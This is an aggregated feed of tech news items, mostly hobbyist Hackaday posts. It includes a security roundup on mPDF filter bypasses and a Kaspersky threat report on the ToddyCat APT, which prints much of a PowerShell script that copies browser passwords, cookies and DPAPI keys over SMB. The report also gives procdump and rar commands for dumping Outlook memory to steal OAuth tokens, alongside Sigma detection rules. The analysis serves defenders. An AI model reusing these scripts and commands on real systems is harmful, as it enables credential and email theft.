For those of you who haven’t spent time in North America around this time of year, you may be unaware of two things: one, the obligatory non-stop loop of “All I Want For Christmas Is You” retail workers are subjected to starting November first, and two: there is a strong cultural association between Christmastime and model railroading that may not exist elsewhere. That may down to childhood memories of when we got our first trainsets, or an excellent postwar marketing campaign by Lionel. Either way, now that Mariah Carey is blaring, we’re thinking about our holiday track layouts. Which makes this long presentation on Wiring for Small Layouts by [Chicago Crossing Model Railroad] quite timely.

There are actually three videos in this little course; the first focuses mostly on the tools and hardware used for DCC wiring (that’s Digital Command Control), which will be of less interest to our readers– most of you are well aware how to perform a lineman’s splice, crimp connectors onto a wire, and use terminal blocks.

The second two videos are actually about wiring, in the sense of routing all the wires needed for a modern layout– which is a lot more than “plug the rheostat into the tracks in one spot” that our first Lionel boxed set needed. No, for the different accessories there are multiple busses at 5V, 12V and 24V along with DCC that need to be considered. Unsurprisingly enough given those voltages, he starts with an ATX power supply and breaks out from there.

Even if you’re not into model railroading, you might learn something from these videos if you haven’t done many projects with multiple busses and wire runs before. It’s far, far too easy to end up with a rats nest of wires, be they DCC, I2C or otherwise. A little planning can save some big headaches down the line, and if this is a new skill for you [Chicago Crossing Model Railroad] provides a good starting point for that planning. Just skip ahead a couple minutes for him to actually start talking if you don’t want the musical cliff notes montage at the start of the videos.

If you don’t have any model trains, don’t worry, you can 3D print them. Lack of room isn’t really an excuse.

youtube.com/embed/McZgSs4Be78?…

hackaday.com/2025/11/21/wiring…

When people talk about the lack of a DOOM being the doom Commodore home computers, they aren’t talking about the C64, which was deep into obsolescence when demon-slaying suddenly became the minimal requirement for all computing devices. That didn’t stop [Kamil Wolnikowski] and [Piotr Kózka] from hacking together Grey a ray-cast first-person shooter for the Commodore 64.

Grey bares more than a passing resemblance to id-software’s most-ported project. It apparently runs at 16 frames per second on a vanilla C64 — no super CPU required. The secret to the speedy game play is the engine’s clever use of the system’s color mapping functionality: updating color maps is faster than redrawing the screen. Yeah, that makes for rather “blockier” graphics than DOOM, but this is running on a Commodore 64, not a 386 with 4 MB of RAM. Allowances must be made. Come to think of it, we don’t recall DOOM running this smooth on the minimum required hardware — check out the demo video below and let us know what you think.

The four-level demo currently available is about 175 kB, which certainly seems within the realms of possibility for disk games using the trusty 1541. Of course nowadays we do have easier ways to get games onto our vintage computers.

If you’re thinking about Commodore’s other home computer, it did eventually get a DOOM-clone.

youtube.com/embed/LWKhitviPDI?…

Thanks to [Stephen Walters] for the tip.

hackaday.com/2025/11/21/commod…

Wait, what? Is it time for the podcast again? Seems like only yesterday that Dan joined Elliot for the weekly rundown of the choicest hacks for the last 1/52 of a year. but here we are. We had quite a bit of news to talk about, including the winners of the Component Abuse Challenge — warning, some components were actually abused for this challenge. They’re also a trillion pages deep over at the Internet Archive, a milestone that seems worth celebrating.

As for projects, both of us kicked things off with “Right to repair”-adjacent topics, first with a washing machine that gave up its secrets with IR and then with a car that refused to let its owner fix the brakes. We heated things up with a microwave foundry capable of melting cast iron — watch your toes! — and looked at a tiny ESP32 dev board with ludicrously small components. We saw surveyors go to war, watched a Lego sorting machine go through its paces, and learned about radar by spinning up a sonar set from first principles.

Finally, we wrapped things up with another Al Williams signature “Can’t Miss Articles” section, with his deep dive into the fun hackers can have with the now-deprecated US penny, and his nostalgic look at pneumatic tube systems.

html5-player.libsyn.com/embed/…

Download this 100% GMO-free MP3.

Where to Follow Hackaday Podcast

Places to follow Hackaday podcasts:

• iTunes
• Spotify
• Stitcher
• RSS
• YouTube
• Check out our Libsyn landing page

Episode 346 Show Notes:

News:

• Congratulations To The 2025 Component Abuse Challenge Winners
• Meet The Shape That Cannot Pass Through Itself
• Internet Archive Hits One Trillion Web Pages

What’s that Sound?

• [Andy Geppert] knew that was the annoying sound of the elevator at the Courtyard by Marriot hotel in Pasadena.

Interesting Hacks of the Week:

• Reverse Engineering The Miele Diagnostic Interface
• Hyundai Paywalls Brake Pad Changes
• The Simplest Ultrasound Sensor Module, Minus The Module
  
  • Good Vibrations: Giving The HC-SR04 A Brain Transplant
  • Bend It Like (Sonar) Beacon With A Phased Array
  • Fundamentals Of FMCW Radar Help You Understand Your Car’s Point Of View

  
  

• Casting Metal Tools With Kitchen Appliances
  
  • 
    
    • Microwave Forge Casts The Sinking-est Benchy Ever
    • More Microwave Metal Casting

    
    

  
  

• Possibly-Smallest ESP32 Board Uses Smallest-Footprint Parts
  
  • Hacking A Pill Camera

  
  

• WWII Secret Agents For Science

Quick Hacks:

• Elliot’s Picks
  
  • Damn Fine (Solar Powered) Coffee
  • Humane Mousetrap Lets You Know It’s Caught Something
  • In Praise Of Plasma TVs
  • Exploring The Performance Gains Of Four-Pin MOSFETs

  
  

• Dan’s Picks:
  
  • Making A Machine To Sort One Million Pounds Of LEGO
  • The King Of Rocket Photography
  • Cheap VHF Antenna? Can Do!

  
  

Can’t-Miss Articles:

• Hackers Can’t Spend A Penny
  
  • Penny Miser Copper Coin Sorter
  • I Made a Super Simple Penny Sorter!

  
  

• Tech In Plain Sight: Pneumatic Tubes
  
  • The Safe House Milwaukee

  
  

hackaday.com/2025/11/21/hackad…

Have trouble sleeping, or getting to sleep in the first place? You’ve no doubt heard of white noise machines, but know it would be much cooler to make your own. Enter Noise Maker, a DIY sound sculpture by [optimus103733], who wanted to learn something in the process of creating.

The best thing about this sound sculpture aside from the looks is that you can not only play five different sounds (e.g. birds, traffic, water, frog, white noise), you can mix them together into a rich but relaxing cacophony.

As you can probably see from the picture, Noise Maker is based on the ESP32 and uses an SD card module, an amplifier, and five pots. Be sure to check out the pictures, because there are three layers of copper connections and a lot of careful bending to make it all come together. In the video after the break, you can hear it in action.

It seems [optimus103733] isn’t completely satisfied and wants to make a few improvements in the future, such as a voltage regulator, a power switch, and a timer to automatically stop playback once (we assume) sleep has come. Evidently the ESP32 struggles a little with mixing six audio sources, but hey, lesson learned.

Wait, why do we sleep in the first place?

youtube.com/embed/aQic2eBXzWk?…

hackaday.com/2025/11/21/sweet-…

You may have noticed that large pieces of the Internet were down on Tuesday. It was a problem at Cloudflare, and for once, it wasn’t DNS. This time it was database management, combined with a safety limit that failed unsafe when exceeded.

Cloudflare’s blog post on the matter has the gritty details. It started with an update to how Cloudflare’s ClickHouse distributed database was responding to queries. A query of system columns was previously only returning data from the default database. As a part of related work, that system was changed so that this query now returned all the databases the given user had access to. In retrospect it seems obvious that this could cause problems, but it wasn’t predicted to cause problems. The result was that a database query to look up bot-management features returned the same features multiple times.

That featurelist is used to feed the Cloudflare bot classification system. That system uses some AI smarts, and runs in the core proxy system. There are actually two versions of the core proxy, and they behaved a bit differently when the featurelist exceeded the 200 item limit. When the older version failed, it classified all traffic as a bot. The real trouble was the newer Rust code. That version of the core proxy threw an error in response, leading to 5XX HTTP errors, and the Internet-wide fallout.

Dangling Azure

There’s a weird pitfall with cloud storage when a storage name is used and then abandoned. It’s very much like what happens when a domain name is used and then allowed to expire: Someone else can come along and register it. Microsoft Azure has its own variation on this, in the form of Azure blob storage. And the folks at Eye Security’s research team found one of these floating blobs in an unexpected place: In Microsoft’s own Update Health Service.

The 1.0 version of this tool was indeed exploitable. A simple payload hosted on one of these claimed blob endpoints could trigger an explorer.exe execution with an arbitrary parameter, meaning trivial code execution. The 1.1 version of the Update Health Service isn’t vulnerable by default, requiring a registry change before reaching out to the vulnerable blob locations. That said, there are thousands of machines looking to these endpoints that would be vulnerable to takeover. After the problem was reported, Microsoft took over the blob names to prevent any future misuse.

BADAUDIO

There’s a new malware strain from APT24, going by the name BADAUDIO. Though “new” is a bit of a misnomer here, as the first signs of this particular malware were seen back in 2022. What is new is that Google Threat Intelligence reporting on it. The campaign uses multiple techniques, like compromising existing websites to serve the malware in “watering hole” attacks, to spam and spearphishing.

Notable here is how obfuscated the BADAUDIO malware loader is, using control flow flattening to resist analysis. First consider how good code uses functions to group code into logical blocks. This technique does the opposite, putting code into blocks randomly. The primary mechanism for execution is DLL sideloading, where a legitimate application is run with a malicious DLL in its search path, again primarily to avoid detection. It’s an extraordinarily sneaky bit of malware.

Don’t Leave The Defaults

There’s an RCE (Remote Code Execution) in the W3 Total Cache WordPress plugin. The vulnerability is an eval() that can be reached by putting code in a page to be cached. So if a WordPress site allows untrusted comments, and has caching enabled, there’s just one more hurdle to clear. And that is the W3TC_DYNAMIC_SECURITY value, which seems to be intended to stave off exactly this sort of weakness. So here’s the lesson, don’t leave this sort of security feature default.

Not a Vulnerability

We have a trio of stories that aren’t technically vulnerabilities. The first two are in the mPDF library, that takes HTML code and generates PDFs — great for packaging documentation. The first item of interest in mPDF is the handling of @import css rules. Interestingly, these statements seem to be evaluated even outside of valid CSS, and are handled by passing the URL off to curl to actually fetch the remote content. Those URLs must end in .css, but there’s no checking whether that is in a parameter or not. So evil.org/?.css is totally valid. The use of curl is interesting for another reason, that the Gopher protocol allows for essentially unrestricted TCP connections.

The next quirk in mPDF is in how .svg files are handled. Specifically, how an image xlink inside an svg behaves, when it uses the phar:// or php:// prefixes. These are PHP Archive links, or a raw php link, and the mPDF codebase already guards against such shenanigans, matching links starting with either prefix. The problem here is that there’s path mangling that happens after that guard code. To skip straight to the punchline, :/phar:// and :/php:// will bypass that filter, and potentially run code or leak information.

Now the big question: Why are neither of those vulnerabilities? Even when one is a bypass for a CVE fix from 2019? Because mPDF is only to be used with sanitized input, and does not do that sanitization as part of its processing. And that does check out. It’s probably the majority of tools and libraries that will do something malicious if fed malicious input.

There’s one more “vulnerable” library, esbuild, that has an XSS (Cross Site Scripting) potential. It comes down to the use of escapeForHTML(), and the fact that function doesn’t sanitize quotation marks. Feed that malicious text, and the unescaped quotation mark allows for plenty of havoc. So why isn’t this one a vulnerability? Because the text strings getting parsed are folder names. And if you can upload an arbitrary folder to the server where esbuild runs, you already have plenty of other ways to run code.

Bits and Bytes

There’s another Fortinet bug being exploited in the wild, though this one was patched with FortiWeb 8.0.2. This one gets the WatchTowr treatment. It’s a path traversal that bypasses any real authentication. There are a couple of validation checks that are straightforward to meet, and then the cgi_process() API can be manipulated as any user without authentication. Ouch.

The Lite XL text editor seems pretty nifty, running on Windows, Linux, and macOS, and supporting lua plugins for extensibility. That Lua code support was quite a problem, as opening a project would automatically run the .lua configuration files, allowing direct use of os.execute(). Open a malicious project, run malicious code.

And finally, sometimes it’s the easy approach that works the best. [Eaton] discovered A Cracker Barrel administrative panel built in React JS, and all it took to bypass authentication was to set isAuthenticated = true in the local browser. [Eaton] started a disclosure process, and noticed the bug had already been fixed, apparently discovered independently.

Dogfooding is usually a good thing: That’s when a company uses their own code internally. It’s not so great when it’s a cloud company, and that code has problems. Oracle had this exact problem, running the Oracle Identity Governance Suite. It had a few authentication bypasses, like the presence of ?WSDL or ;.wadl at the end of a URL. Ah, Java is magical.

hackaday.com/2025/11/21/this-w…

The original Xbox was different from the consoles that had gone before, in that its hardware shared much with a PC of the day. It was found to be hackable, and one of the most successful projects to take advantage of it was a media centre. You know it as Kodi, but its previous name was XBMC, for Xbox Media Centre. The last version that still ran on an original Xbox saw the light of day in 2016, so it’s definitely a surprise that a new version has appeared.

XBMC version 4.0 brings a host of new features to the venerable platform, including the Estuary user interface that will be famniliar to users of more recent Kodi versions, a better games library,, and more. The plugin system has been revamped too, and while it retains the Python 2 version from back in the day it’s promised that a Python 3 update is in the works. That’s right, it sounds as though there will be more releases. Get them from the GitHub repository.

We’re not sure how many of you have early Xbox hardware along with the inclination to use it as a media centre, after all Kodi runs so well on a lot of very accessible hardware. But we’re impressed that the developers of this release have managed so much within the confines of a machine with a 2000s-era spec, and have released it at all.

If you’re curious about Xbox hacking, take a look at some of its early history.

hackaday.com/2025/11/21/rememb…

Introduction

Email remains the main means of business correspondence at organizations. It can be set up either using on-premises infrastructure (for example, by deploying Microsoft Exchange Server) or through cloud mail services such as Microsoft 365 or Gmail.

At first glance, it might seem that using cloud services offers a higher level of confidentiality for corporate correspondence: mail data remains external, even if the organization’s internal infrastructure is compromised. However, this does not stop highly organized espionage groups like the ToddyCat APT group.

This research describes how ToddyCat APT evolved its methods to gain covert access to the business correspondence of employees at target companies. In the first part, we review the incidents that occurred in the second half of 2024 and early 2025. In the second part of the report, we focus in detail on how the attackers implemented a new attack vector as a result of their efforts. This attack enables the adversary to leverage the user’s browser to obtain OAuth 2.0 authorization tokens. These tokens can then be utilized outside the perimeter of the compromised infrastructure to access corporate email.

Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

TomBerBil in PowerShell

In a previous post on the ToddyCat group, we described the TomBerBil family of tools, which are designed to extract cookies and saved passwords from browsers on user hosts. These tools were written in C# and C++.

Yet, analysis of incidents from May to June 2024 revealed a new variant implemented in PowerShell. It retained the core malicious functionality of the previous samples but employed a different implementation approach and incorporated new commands.

A key feature of this version is that it was executed on domain controllers on behalf of a privileged user, accessing browser files via shared network resources using the SMB protocol.

Besides supporting the Chrome and Edge browsers, the new version also added processing for Firefox browser files.

The tool was launched using a scheduled task that executed the following command line:
powershell -exec bypass -command "c:\programdata\ip445.ps1"
The script begins by creating a new local directory, which is specified in the $baseDir variable. The tool saves all data it collects into this directory.
$baseDir = 'c:\programdata\temp\'

try{
New-Item -ItemType directory -Path $baseDir | Out-Null
}catch{

}
The script defines a function named parseFile, which accepts the full file path as a parameter. It opens the C:\programdata\uhosts.txt file and reads its content line by line using .NET Framework classes, returning the result as a string array. This is how the script forms an array of host names.
function parseFile{
param(
[string]$fileName
)

$fileReader=[System.IO.File]::OpenText($fileName)

while(($line = $fileReader.ReadLine()) -ne $null){
try{
$line.trim()
}
catch{
}
}
$fileReader.close()
}
For each host in the array, the script attempts to establish an SMB connection to the shared resource c$, constructing the path in the \\\c$\users\ format. If the connection is successful, the tool retrieves a list of user directories present on the remote host. If at least one directory is found, a separate folder is created for that host within the $baseDir working directory:
foreach($myhost in parseFile('c:\programdata\uhosts.txt')){
$myhost=$myhost.TrimEnd()
$open=$false

$cpath = "\\{0}\c$\users\" -f $myhost
$items = @(get-childitem $cpath -Force -ErrorAction SilentlyContinue)

$lpath = $baseDir + $myhost
try{
New-Item -ItemType directory -Path $lpath | Out-Null
}catch{

}
In the next stage, the script iterates through the user folders discovered on the remote host, skipping any folders specified in the $filter_users variable, which is defined upon launching the tool. For the remaining folders, three directories are created in the script’s working folder for collecting data from Google Chrome, Mozilla Firefox, and Microsoft Edge.
$filter_users = @('public','all users','default','default user','desktop.ini','.net v4.5','.net v4.5 classic')

foreach($item in $items){

$username = $item.Name
if($filter_users -contains $username.tolower()){
continue
}
$upath = $lpath + '\' + $username

try{
New-Item -ItemType directory -Path $upath | Out-Null
New-Item -ItemType directory -Path ($upath + '\google') | Out-Null
New-Item -ItemType directory -Path ($upath + '\firefox') | Out-Null
New-Item -ItemType directory -Path ($upath + '\edge') | Out-Null
}catch{

}
Next, the tool uses the default account to search for the following Chrome and Edge browser files on the remote host:

• Login Data: a database file that contains the user’s saved logins and passwords for websites in an encrypted format
• Local State: a JSON file containing the encryption key used to encrypt stored data
• Cookies: a database file that stores HTTP cookies for all websites visited by the user
• History: a database that stores the browser’s history

These files are copied via SMB to the local folder within the corresponding user and browser folder hierarchy. Below is a code snippet that copies the Login Data file:
$googlepath = $upath + '\google\'
$firefoxpath = $upath + '\firefox\'
$edgepath = $upath + '\edge\'
$loginDataPath = $item.FullName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data"
if(test-path -path $loginDataPath){
$dstFileName = "{0}\{1}" -f $googlepath,'Login Data'
copy-item -Force -Path $loginDataPath -Destination $dstFileName | Out-Null
}
The same procedure is applied to Firefox files, with the tool additionally traversing through all the user profile folders of the browser. Instead of the files described above for Chrome and Edge, the script searches for files which have names from the $firefox_files array that contain similar information. The requested files are also copied to the tool’s local folder.
$firefox_files = @('key3.db','signons.sqlite','key4.db','logins.json')

$firefoxBase = $item.FullName + '\AppData\Roaming\Mozilla\Firefox\Profiles'
if(test-path -path $firefoxBase){
$profiles = @(get-childitem $firefoxBase -Force -ErrorAction SilentlyContinue)
foreach($profile in $profiles){
if(!(test-path -path ($firefoxpath + '\' + $profile.Name))){
New-Item -ItemType directory -Path ($firefoxpath + '\' + $profile.Name) | Out-Null
}
foreach($firefox_file in $firefox_files){
$tmpPath = $firefoxBase + '\' + $profile.Name + '\' + $firefox_file
if(test-path -Path $tmpPath){
$dstFileName = "{0}\{1}\{2}" -f $firefoxpath,$profile.Name,$firefox_file
copy-item -Force -Path $tmpPath -Destination $dstFileName | Out-Null
}
}
}
}
The copied files are encrypted using the Data Protection API (DPAPI). The previous version of TomBerBil ran on the host and copied the user’s token. As a result, in the user’s current session DPAPI was used to decrypt the master key, and subsequently, the files. The updated server-side version of TomBerBil copies files containing the user encryption keys that are used by DPAPI. These keys, combined with the user’s SID and password, grant the attackers the ability to decrypt all the copied files locally.
if(test-path -path ($item.FullName + '\AppData\Roaming\Microsoft\Protect')){
copy-item -Recurse -Force -Path ($item.FullName + '\AppData\Roaming\Microsoft\Protect') -Destination ($upath + '\') | Out-Null
}
if(test-path -path ($item.FullName + '\AppData\Local\Microsoft\Credentials')){
copy-item -Recurse -Force -Path ($item.FullName + '\AppData\Local\Microsoft\Credentials') -Destination ($upath + '\') | Out-Null
}
With TomBerBil, the attackers automatically collected user cookies, browsing history, and saved passwords, while simultaneously copying the encryption keys needed to decrypt the browser files. The connection to the victim’s remote hosts was established via the SMB protocol, which significantly complicated the detection of the tool’s activity.

TomBerBil in PowerShell

As a rule, such tools are deployed at later stages, after the adversary has established persistence within the organization’s internal infrastructure and obtained privileged access.

Detection

To detect the implementation of this attack, it’s necessary to set up auditing for access to browser folders and to monitor network protocol connection attempts to those folders.
title: Access To Sensitive Browser Files Via Smb
id: 9ac86f68-9c01-4c9d-897a-4709256c4c7b
status: experimental
description: Detects remote access attempts to browser files containing sensitive information
author: Kaspersky
date: 2025-08-11
tags:
- attack.credential-access
- attack.t1555.003
logsource:
product: windows
service: security
detection:
event:
EventID: '5145'
chromium_files:
ShareLocalPath|endswith:
- '\User Data\Default\History'
- '\User Data\Default\Network\Cookies'
- '\User Data\Default\Login Data'
- '\User Data\Local State'
firefox_path:
ShareLocalPath|contains: '\AppData\Roaming\Mozilla\Firefox\Profiles'
firefox_files:
ShareLocalPath|endswith:
- 'key3.db'
- 'signons.sqlite'
- 'key4.db'
- 'logins.json'
condition: event and (chromium_files or firefox_path and firefox_files)
falsepositives: Legitimate activity
level: medium
In addition, auditing for access to the folders storing the DPAPI encryption key files is also required.
title: Access To System Master Keys Via Smb
id: ba712364-cb99-4eac-a012-7fc86d040a4a
status: experimental
description: Detects remote access attempts to the Protect file, which stores DPAPI master keys
references:
- synacktiv.com/en/publications/…
author: Kaspersky
date: 2025-08-11
tags:
- attack.credential-access
- attack.t1555
logsource:
product: windows
service: security
detection:
selection:
EventID: '5145'
ShareLocalPath|contains: 'windows\System32\Microsoft\Protect'
condition: selection
falsepositives: Legitimate activity
level: medium

Stealing emails from Outlook

The modified TomBerBil tool family proved ineffective at evading monitoring tools, compelling the threat actor to seek alternative methods for accessing the organization’s critical data. We discovered an attempt to gain access to corporate correspondence files in the local Outlook storage.

The Outlook application stores OST (Offline Storage Table) files for offline use. The names of these files contain the address of the mailbox being cached. Outlook uses OST files to store a local copy of data synchronized with mail servers: Microsoft Exchange, Microsoft 365, or Outlook.com. This capability allows users to work with emails, calendars, contacts, and other data offline, then synchronize changes with the server once the connection is restored.

However, access to an OST file is blocked by the application while Outlook is running. To copy the file, the attackers created a specialized tool called TCSectorCopy.

TCSectorCopy

This tool is designed for block-by-block copying of files that may be inaccessible by applications or the operating system, such as files that are locked while in use.

The tool is a 32-bit PE file written in C++. After launch, it processes parameters passed via the command line: the path to the source file to be copied and the path where the result should be saved. The tool then validates that the source path is not identical to the destination path.

Validating the TCSectorCopy command line parameters

Next, the tool gathers information about the disk hosting the file to be copied: it determines the cluster size, file system type, and other parameters necessary for low-level reading.

Determining the disk’s file system type

TCSectorCopy then opens the disk as a device in read-only mode and sequentially copies the file content block by block, bypassing the standard Windows API. This allows the tool to copy even the files that are locked by the system or other applications.

The adversary uploaded this tool to target host and used it to copy user OST files:
xCopy.exe C:\Users\<user>\AppData\Local\Microsoft\Outlook\<email>@<domain>.ost <email>@<domain>.ost2
Having obtained the OST files, the attackers processed them using a separate tool to extract the email correspondence content.

XstReader

XstReader is an open-source C# tool for viewing and exporting the content of Microsoft Outlook OST and PST files. The attackers used XstReader to export the content of the previously copied OST files.

XstReader is executed with the -e parameter and the path to the copied file. The -e parameter specifies the export of all messages and their attachments to the current folder in the HTML, RTF, and TXT formats.
XstExport.exe -e <email>@<domain>.ost2
After exporting the data from the OST file, the attackers review the list of obtained files, collect those of interest into an archive, and exfiltrate it.

Stealing data with TCSectorCopy and XstReader

Detection

To detect unauthorized access to Outlook OST files, it’s necessary to set up auditing for the %LOCALAPPDATA%\Microsoft\Outlook\ folder and monitor access events for files with the .ost extension. The Outlook process and other processes legitimately using this file must be excluded from the audit.
title: Access To Outlook Ost Files
id: 2e6c1918-08ef-4494-be45-0c7bce755dfc
status: experimental
description: Detects access to the Outlook Offline Storage Table (OST) file
author: Kaspersky
date: 2025-08-11
tags:
- attack.collection
- attack.t1114.001
logsource:
product: windows
service: security
detection:
event:
EventID: 4663
outlook_path:
ObjectName|contains: '\AppData\Local\Microsoft\Outlook\'
ost_file:
ObjectName|endswith: '.ost'
condition: event and outlook_path and ost_file
falsepositives: Legitimate activity
level: low
The TCSectorCopy tool accesses the OST file via the disk device, so to detect it, it’s important to monitor events such as Event ID 9 (RawAccessRead) in Sysmon. These events indicate reading directly from the disk, bypassing the file system.

As we mentioned earlier, TCSectorCopy receives the path to the OST file via a command line. Consequently, detecting this tool’s malicious activity requires monitoring for a specific OST file naming pattern: the @ symbol and the .ost extension in the file name.

Example of detecting TCSectorCopy activity in KATA

Stealing access tokens from Outlook

Since active file collection actions on a host are easily tracked using monitoring systems, the attackers’ next step was gaining access to email outside the hosts where monitoring was being performed. Some target organizations used the Microsoft 365 cloud office suite. The attackers attempted to obtain the access token that resides in the memory of processes utilizing this cloud service.

In the OAuth 2.0 protocol, which Microsoft 365 uses for authorization, the access token is used when requesting resources from the server. In Outlook, it is specified in API requests to the cloud service to retrieve emails along with attachments. Its disadvantage is its relatively short lifespan; however, this can be enough to retrieve all emails from a mailbox while bypassing monitoring tools.

The access token is stored using the JWT (JSON Web Tokens) standard. The token content is encoded using Base64. JWT headers for Microsoft applications always specify the typ parameter with the JWT value first. This means that the first 18 characters of the encoded token will always be the same.

The attackers used SharpTokenFinder to obtain the access token from the user’s Outlook application. This tool is written in C# and designed to search for an access token in processes associated with the Microsoft 365 suite. After launch, the tool searches the system for the following processes:

• “TEAMS”
• “WINWORD”
• “ONENOTE”
• “POWERPNT”
• “OUTLOOK”
• “EXCEL”
• “ONEDRIVE”
• “SHAREPOINT”

If these processes are found, the tool attempts to open each process’s object using the OpenProcess function and dump their memory. To do this, the tool imports the MiniDumpWriteDump function from the dbghelp.dll file, which writes user mode minidump information to the specified file. The dump files are saved in the dump folder, located in the current SharpTokenFinder directory. After creating dump files for the processes, the tool searches for the following string pattern in each of them:
"eyJ0eX[a-zA-Z0-9\\._\\-]+"
This template uses the first six symbols of the encoded JWT token, which are always the same. Its structures are separated by dots. This is sufficient to find the necessary string in the process memory dump.

Example of a JWT Token

In the incident being described, the local security tools (EPP) blocked the attempt to create the OUTLOOK.exe process dump using SharpTokenFinder, so the operator used ProcDump from the Sysinternals suite for this purpose:
procdump64.exe -accepteula -ma OUTLOOK.exe
dir c:\windows\temp\OUTLOOK.EXE_<id>.dmp
c:\progra~1\winrar\rar.exe a -k -r -s -m5 -v100M %temp%\dmp.rar c:\windows\temp\OUTLOOK.EXE_<id>.dmp
Here, the operator executed ProcDump with the following parameters:

• accepteula silently accepts the license agreement without displaying the agreement window.
• ma indicates that a full process dump should be created.
• exe is the name of the process to be dumped.

The dir command is then executed as a check to confirm that the file was created and is not zero size. Following this validation, the file is added to a dmp.rar archive using WinRAR. The attackers sent this file to their host via SMB.

Detection

To detect this technique, it’s necessary to monitor the ProcDump process command line for names belonging to Microsoft 365 application processes.
title: Dump Of Office 365 Processes Using Procdump
id: 5ce97d80-c943-4ac7-8caf-92bb99e90e90
status: experimental
description: Detects Office 365 process names in the command line of the procdump tool
author: kaspersky
date: 2025-08-11
tags:
- attack.lateral-movement
- attack.defense-evasion
- attack.t1550.001
logsource:
category: process_creation
product: windows
detection:
selection:
Product: 'ProcDump'
CommandLine|contains:
- 'teams'
- 'winword'
- 'onenote'
- 'powerpnt'
- 'outlook'
- 'excel'
- 'onedrive'
- 'sharepoint'
condition: selection
falsepositives: Legitimate activity
level: high
Below is an example of the ProcDump tool from the Sysinternals package used to dump the Outlook process memory, detected by Kaspersky Anti Targeted Attack (KATA).

Example of Outlook process dump detection in KATA

Takeaways

The incidents reviewed in this article show that ToddyCat APT is constantly evolving its techniques and seeking new ways to conceal its activity aimed at gaining access to corporate correspondence within compromised infrastructure. Most of the techniques described here can be successfully detected. For timely identification of these techniques, we recommend using both host-based EPP solutions, such as Kaspersky Endpoint Security for Business, and complex threat monitoring systems, such as Kaspersky Anti Targeted Attack. For comprehensive, up-to-date information on threats and corresponding detection rules, we recommend Kaspersky Threat Intelligence.

Indicators of compromise

Malicious files
55092E1DEA3834ABDE5367D79E50079A ip445.ps1
2320377D4F68081DA7F39F9AF83F04A2 xCopy.exe
B9FDAD18186F363C3665A6F54D51D3A0 stf.exe

Not-a-virus files
49584BD915DD322C3D84F2794BB3B950 XstExport.exe

File paths
C:\programdata\ip445.ps1
C:\Windows\Temp\xCopy.exe
C:\Windows\Temp\XstExport.exe
c:\windows\temp\stf.exe

PDB
O:\Projects\Penetration\Tools\SectorCopy\Release\SectorCopy.pdb

securelist.com/toddycat-apt-st…

Gli specialisti di ThreatFabric hanno scoperto un nuovo trojan bancario, Sturnus. Il malware è in grado di intercettare i messaggi provenienti da app di messaggistica crittografate end-to-end (Signal, WhatsApp, Telegram) e di ottenere il pieno controllo dei dispositivi tramite VNC.

I ricercatori segnalano che Sturnus utilizza uno schema di comunicazione avanzato con i server di comando e controllo: una combinazione di crittografia in chiaro, RSA e AES.

Una volta installato, il malware si connette al server di comando e controllo, registra la vittima e crea due canali di comunicazione: HTTPS crittografato per i comandi e l’esfiltrazione dei dati e un WebSocket crittografato con AES per le operazioni VNC in tempo reale.

In genere, un’infezione da Sturnus inizia con il download di un APK dannoso mascherato da Google Chrome (com.klivkfbky.izaybebnx) o Preemix Box (com.uvxuthoq.noscjahae). Il metodo esatto di distribuzione è ancora sconosciuto, ma i ricercatori sospettano che gli aggressori utilizzino annunci pubblicitari dannosi o messaggi privati nelle app di messaggistica.

Il trojan intercetta i messaggi nelle app di messaggistica istantanea non durante la trasmissione, ma dopo la decrittazione. In sostanza, il malware legge semplicemente il contenuto direttamente dallo schermo del dispositivo infetto. Per farlo, Sturnus sfrutta il servizio di accessibilità, ottenendo l’accesso a tutto ciò che viene visualizzato sullo schermo: contatti, chat, messaggi in entrata e in uscita.

“Ciò consente di aggirare completamente la crittografia end-to-end, consentendo l’accesso ai messaggi dopo che sono stati decifrati da un’app legittima, dando agli aggressori accesso diretto a conversazioni presumibilmente private”, osservano i ricercatori.

Oltre a leggere i messaggi, Sturnus richiede privilegi di amministratore su Android, consentendogli di monitorare le modifiche alle password, bloccare da remoto il dispositivo ed eludere la rimozione. A meno che i privilegi di amministratore non vengano revocati manualmente, la disinstallazione e la rimozione tramite ADB saranno bloccate.

Utilizzando VNC, gli aggressori possono simulare la pressione di tasti, l’immissione di testo, lo scorrimento e la navigazione. Al momento opportuno, possono attivare una sovrapposizione nera ed eseguire azioni nascoste: trasferire denaro da app bancarie, confermare conversazioni, approvare l’autenticazione a più fattori, modificare le impostazioni o installare app aggiuntive.

Sturnus prende di mira principalmente i conti di istituti finanziari europei, utilizzando modelli di overlay regionali. Attualmente, la banca starebbe prendendo di mira principalmente utenti dell’Europa meridionale e centrale. Poiché la portata degli attacchi è ancora limitata, i ricercatori ritengono che gli hacker stiano testando le proprie capacità prima di lanciare campagne più ampie.

L'articolo Sturnus, il trojan bancario che intercetta i messaggi di WhatsApp, Telegram e Signal proviene da Red Hot Cyber.

Have you ever wondered what goes into making it possible to use the restroom at 30,000 feet (10,000 m)? [Jason Torchinsky] at the Autopian recently gave us an interesting look at the history of the loftiest of loos.

The first airline toilets were little more than buckets behind a curtain, but eventually the joys of indoor plumbing took to the skies. Several interim solutions like relief tubes that sent waste out into the wild blue yonder or simple chemical toilets that held waste like a flying porta-potty predated actual flush toilets, however. Then, in the 1980s, commercial aircraft started getting vacuum-driven toilets that reduce the amount of water needed, and thus the weight of the system.

These vacuum-assisted aircraft toilets have PTFE-lined bowls that are rinsed with blue cleaning fluid that helps everything flow down the drain when you flush. The waste and fluid goes into a central waste tank that is emptied into a “honey truck” while at the airport. While “blue ice” falling from the sky happens on occasion, it is rare that the waste tanks leak and drop frozen excrement from the sky, which is a lot better than when the lavatory was a funnel and tube.

The longest ever flight used a much simpler toilet, and given the aerospace industry’s love of 3D printing, maybe a 3D printed toilet is what’s coming to an airplane lavatory near you?

hackaday.com/2025/11/21/handli…

Il panorama ransomware sta cambiando. Gli attori più esposti — LockBit, Hunters International, Trigona — hanno pagato il prezzo della sovraesposizione, tra operazioni internazionali, infiltrazioni, leak volontari e collassi operativi.

Dopo anni dominati da modelli quasi industriali — affiliate panel, leak site, chat pubbliche e marketing aggressivo — emergono gruppi che rifiutano la logica “LockBit-style” e si spingono verso un approccio più opaco, minimale, quasi “da operatore SIGINT”. Low profile, tecnici, quasi “professionali”, che adottano strategie di invisibilità operativa.

